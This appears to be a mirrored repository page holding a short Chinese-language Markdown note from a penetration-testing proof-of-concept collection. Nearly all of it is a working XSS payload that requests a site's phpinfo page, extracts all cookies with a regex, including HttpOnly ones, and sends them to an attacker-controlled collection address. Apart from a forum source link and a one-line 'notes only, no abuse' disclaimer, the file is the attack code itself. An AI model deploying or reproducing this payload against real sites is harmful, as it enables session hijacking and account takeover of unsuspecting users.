admin/Penetration_Testing_POC
1
0
Fork 0
mirror of https://github.com/Mr-xn/Penetration_Testing_POC.git synced 2025-07-30 06:24:22 +00:00
Code Issues Packages Projects Releases Wiki Activity
Penetration_Testing_POC/通过phpinfo获取cookie突破httponly.md

36 lines
923 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

### `XSS`代码
```javascript
<script>
function createXmlHttp() {
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
} else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
}
function getS() {
var Url = 'PHPinfo的地址';
createXmlHttp();
xmlHttp.onreadystatechange = writeS;
xmlHttp.open("GET", Url, true);
xmlHttp.send(null);
}
function writeS() {
if (xmlHttp.readyState == 4) {
var x = xmlHttp.responseText.match(/HTTP_COOKIE.+?<\/td><td.+?>([\w\W]+?)<\/td>/);
if (x){
var url = "自己收取cookie的地址" + x[1]; //x 为带httponly cookie的所有cookie
createXmlHttp();
xmlHttp.open("GET", url, true);
xmlHttp.send(null);
}
}
}
getS();
</script>
```
来源https://www.t00ls.net/thread-55915-1-1.html https://www.t00ls.net/thread-55912-1-1.html
仅作笔记.禁止滥用.
Reference in New Issue View Git Blame Copy Permalink